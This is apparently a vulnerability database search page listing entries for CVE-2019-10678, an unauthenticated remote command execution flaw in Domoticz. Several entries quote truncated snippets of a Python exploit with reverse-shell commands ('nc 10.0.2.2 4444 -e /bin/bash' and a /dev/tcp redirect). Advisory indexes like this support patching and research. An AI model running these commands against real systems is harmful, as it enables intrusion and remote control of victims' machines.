Lucene search
K

6 matches found

0day.today
0day.today
added 2019/05/01 12:0 a.m.100 views

Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit

Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...

7.5CVSS8.8AI score0.1727EPSS
Exploits5
Packet Storm
Packet Storm
added 2019/04/30 12:0 a.m.76 views

Domoticz 4.10577 Unauthenticated Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...

7.5CVSS0.4AI score0.1727EPSS
Exploits5
Circl
Circl
added 2019/04/30 12:0 a.m.35 views

CVE-2019-10678

creationtimestamp| type| source ---|---|--- 2019-04-30 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/46773...

7.5CVSS7.6AI score0.1727EPSS
Exploits5References1
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.64 views

Domoticz 4.10577 - Unauthenticated Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...

9.8CVSS8.7AI score0.1727EPSS
Exploits5
NVD
NVD
added 2019/03/31 9:29 p.m.21 views

CVE-2019-10678

Domoticz before 4.10579 neglects to categorize \n and \r as insecure argument options...

7.5CVSS7.5AI score0.1727EPSS
Exploits5References3
CVE
CVE
added 2019/03/31 8:53 p.m.84 views

CVE-2019-10678

CVE-2019-10678 affects Domoticz prior to 4.10579. The root cause is improper categorization of newline and carriage return characters as insecure argument options, enabling the potential for unauthenticated command execution given available exploits for Domoticz

7.5CVSS7.8AI score0.1727EPSS
Exploits5References3Affected Software1
Rows per page
Query Builder